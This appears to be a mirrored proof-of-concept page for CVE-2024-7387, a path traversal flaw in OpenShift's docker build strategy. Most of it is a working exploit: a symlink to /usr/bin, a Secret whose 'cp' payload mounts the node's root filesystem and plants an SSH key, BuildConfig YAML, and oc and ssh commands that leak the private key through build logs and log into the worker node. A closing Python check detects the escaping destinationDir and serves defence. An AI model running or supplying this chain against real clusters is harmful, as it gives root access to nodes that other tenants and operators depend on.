Related vulnerability

Description
poc for path traversal allowing privilege escalation from developer to worker node

Introduction
            ### overview
[cve-2024-7387](https://nvd.nist.gov/vuln/detail/CVE-2024-7387) is a path traversal vulnerability in openshift's docker build strategy (the `openshift/builder` component) that lets a user who can create a `BuildConfig` overwrite binaries inside the privileged build container. the `destinationDir` of a source secret is joined onto the build context without checking where it actually resolves; by pointing it at a symbolic link to `/usr/bin` committed in the source repository, the secret's keys are written into `/usr/bin` & replace legitimate commands such as `cp`. the builder itself runs `cp` while preparing the build, so the replaced binary executes as root in a privileged container, which is enough to mount the node's root filesystem & inject an SSH key for the `core` user, giving a shell on the worker node.
### exploit
clone the repository containing the vulnerable configuration:
```shell
git clone https://github.com/0xSigSegv0x00/cve-2024-7387.git
cd cve-2024-7387
```
the repository contains a `Dockerfile` that copies the build context into the image, lists its contents, & prints `pwn.txt`, the payload's output file; this is how the exploit's output reaches the build logs:
```Dockerfile
FROM fedora:latest
COPY . .
RUN ls -la && cat pwn.txt
```
>in openshift's docker build strategy, the build context is mounted at `/tmp/build/inputs/` inside the privileged build container. `COPY . .` copies everything from this location into the image.
it also includes a symbolic link `usr_bin` pointing to `/usr/bin`. git preserves the symlink when the builder clones the repository, so `/tmp/build/inputs/usr_bin` resolves to `/usr/bin` inside the build container; this is the traversal primitive.
create a secret whose single key is named `cp`; its value is the bash payload that will replace `/usr/bin/cp`:
```yaml
# malicious-secret.yaml
kind: Secret
apiVersion: v1
metadata:
  name: malicious-secret
stringData:
  # creates a file named `cp` that runs inside a privileged container
  cp: |
    #!/bin/bash
    {
      echo "USER:"
      whoami                                                                                             # checks if we are `root` in container
      
      echo -e "\nMOUNTING HOST FILESYSTEM..."
      mkdir -p /mnt/h                                                                                    # creates a dir to mount the host disk
      mount /dev/vda4 /mnt/h 2>&1                                                                        # mounts the node's root partition (vda4 on the default fedora coreos disk layout; adjust for the target node)
      
      echo -e "\nADDING SSH KEY TO CORE USER..."
      ssh-keygen -t ed25519 -f /tmp/exploit_key -N "" -q                                                 # generates ed25519 SSH key pair without passphrase
      mkdir -p /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh                                     # creates .ssh dir for core user (ostree stateroot is `fedora-coreos` on fcos, `rhcos` on rhcos)
      cat /tmp/exploit_key.pub >> /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys  # adds public key to `authorized_keys`
      chmod 600 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys                    # sets correct permissions
      chown 1000:1000 /mnt/h/ostree/deploy/fedora-coreos/var/home/core/.ssh/authorized_keys              # sets ownership to core user (uid 1000)
      
      echo -e "\nPRIVATE SSH KEY:"
      cat /tmp/exploit_key                                                                               # outputs private key for SSH authentication
      
      echo -e "\nPUBLIC SSH KEY:"
      cat /tmp/exploit_key.pub                                                                           # outputs public key for verification
    } > /tmp/build/inputs/pwn.txt 2>&1
    exit 0
type: Opaque
```
apply the secret:
```bash
oc apply -f malicious-secret.yaml
```
>the `cp` key in the secret becomes a file named `cp`. when the secret is mounted via `destinationDir: usr_bin` (a symlink to `/usr/bin`), this file overwrites the legitimate `/usr/bin/cp`. because `cp` truncates & rewrites an existing destination rather than recreating it, `/usr/bin/cp` keeps its executable mode, so the script runs in place of the real binary.
create a trigger secret:
```yaml
# trigger-secret.yaml
kind: Secret
apiVersion: v1
metadata:
  name: trigger-secret
stringData:
  trigger: pwned
type: Opaque
```
apply the trigger secret:
```bash
oc apply -f trigger-secret.yaml
```
>this secret carries no payload; it exists because the builder copies each source secret into the build context with `cp`. any secret processed after the malicious one is copied with the replaced `/usr/bin/cp`, which executes the payload.
create the `BuildConfig` that mounts both secrets:
```yaml
# malicious-build-config.yaml
kind: BuildConfig
apiVersion: build.openshift.io/v1
metadata:
  name: malicious-build-config
spec:
  nodeSelector: null
  strategy:
    type: Docker
    dockerStrategy:
      dockerfilePath: Dockerfile
  source:
    type: Git
    git:
      uri: 'https://github.com/0xSigSegv0x00/cve-2024-7387.git'
      ref: main
    contextDir: /
    secrets:
      - secret:
          name: malicious-secret  # mounts to symlink path
        destinationDir: usr_bin
      - secret:
          name: trigger-secret    # mounts to root of build context
```
>the `destinationDir: usr_bin` mounts the secret at `/tmp/build/inputs/usr_bin` & since `usr_bin` is a symlink to `/usr/bin`, the secret's `cp` file overwrites `/usr/bin/cp`. the trigger-secret mounts to the build context root, & when openshift copies it using the `cp` command, the malicious `/usr/bin/cp` script executes instead.
apply the build configuration:
```bash
oc apply -f malicious-build-config.yaml
```
start the build to execute the payload:
```shell
oc start-build malicious-build-config
```
check the build logs to verify the payload executed:
```shell
oc logs -f build/malicious-build-config-1
```
>the contents of `pwn.txt` displayed in the build logs confirm the malicious script executed successfully & contain the private SSH key needed for host access.
save the private key from the build logs, set correct permissions, & SSH to the worker node. the `authorized_keys` entry was written to the disk of the node that ran the build pod, so `WORKER_IP` must be that node (`oc get pod -o wide` shows the build pod's node, `oc get nodes -o wide` its address):
```shell
# extract the private key block printed via pwn.txt in the build log
oc logs build/malicious-build-config-1 | sed -n '/BEGIN OPENSSH PRIVATE KEY/,/END OPENSSH PRIVATE KEY/p' > exploit_key
chmod 600 exploit_key
ssh -i exploit_key core@WORKER_IP
```
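the whole chain hinges on one missing check: the builder never verifies where a source secret's `destinationDir` lands once symlinks in the cloned repository are followed. the following python is an added example, not code from the cve-2024-7387 repository or from `openshift/builder`; it implements that containment check & runs it against a BuildConfig dict constructed to mirror `malicious-build-config.yaml`, with the repository layout (`Dockerfile` + `usr_bin -> /usr/bin`) recreated in a temporary directory. the function & constant names are the example's own.

```python
"""Containment check for BuildConfig source-secret destinations.

Added example, not code from the cve-2024-7387 repository or from openshift/builder.
It reproduces the condition the exploit relies on: a destinationDir that looks like a
relative path but resolves, through a symlink committed in the source repo, to a
directory outside the build context. The BuildConfig data and repository layout below
are constructed to mirror the page's example.
"""
import os
import tempfile


def destination_escapes_context(context_dir: str, destination_dir: str) -> bool:
    """True if destination_dir, interpreted relative to context_dir, resolves outside it.

    realpath follows symlinks and collapses '..', so a relative-looking value such as
    'usr_bin' is judged by where it actually lands, not by how it is spelled. An
    absolute destination_dir makes os.path.join discard context_dir entirely, and the
    containment test rejects that case as well.
    """
    ctx = os.path.realpath(context_dir)
    target = os.path.realpath(os.path.join(ctx, destination_dir))
    return os.path.commonpath([ctx, target]) != ctx


def audit_source_secrets(build_config: dict, context_dir: str) -> list:
    """Return (secret name, destinationDir) pairs whose destination escapes the context.

    build_config is the parsed JSON/YAML of a BuildConfig (e.g. from `oc get bc -o json`);
    context_dir is a local checkout of spec.source.git at spec.source.contextDir.
    A missing destinationDir means the context root, which can never escape.
    """
    findings = []
    secrets = build_config.get("spec", {}).get("source", {}).get("secrets", []) or []
    for entry in secrets:
        dest = entry.get("destinationDir") or "."
        name = entry.get("secret", {}).get("name", "<unnamed>")
        if destination_escapes_context(context_dir, dest):
            findings.append((name, dest))
    return findings


# Constructed to match the page's malicious-build-config.yaml (only the relevant fields).
MALICIOUS_BUILD_CONFIG = {
    "kind": "BuildConfig",
    "spec": {
        "source": {
            "type": "Git",
            "contextDir": "/",
            "secrets": [
                {"secret": {"name": "malicious-secret"}, "destinationDir": "usr_bin"},
                {"secret": {"name": "trigger-secret"}},
            ],
        }
    },
}


def audit_page_example() -> list:
    """Recreate the cloned repo (Dockerfile + usr_bin -> /usr/bin) in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as repo:
        with open(os.path.join(repo, "Dockerfile"), "w") as f:
            f.write("FROM fedora:latest\nCOPY . .\nRUN ls -la && cat pwn.txt\n")
        os.symlink("/usr/bin", os.path.join(repo, "usr_bin"))  # the traversal primitive
        return audit_source_secrets(MALICIOUS_BUILD_CONFIG, repo)


if __name__ == "__main__":
    for name, dest in audit_page_example():
        print(f"secret {name!r}: destinationDir {dest!r} escapes the build context")
```

against a live cluster the same logic runs over `oc get bc -A -o json`, cloning each `spec.source.git.uri` at its `ref` into a scratch directory & passing the `contextDir` subdirectory as `context_dir`; a static scan of `destinationDir` strings alone would miss this case, since `usr_bin` contains neither `..` nor a leading `/`. a builder that applied this check before copying secrets would refuse the page's BuildConfig instead of overwriting `/usr/bin/cp`.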
        
File snapshot

 [4.0K]  /data/pocs/781d54341d0e925a5ea3dec3ccc458494dfa58cb
├── [  53]  Dockerfile
├── [5.4K]  README.md
└── [   8]  usr_bin -> /usr/bin
1 directory, 2 files
                
             
         
Notes

1. Accessing the PoC through the original source is recommended.
2. If the source is unavailable or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has snapshotted the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.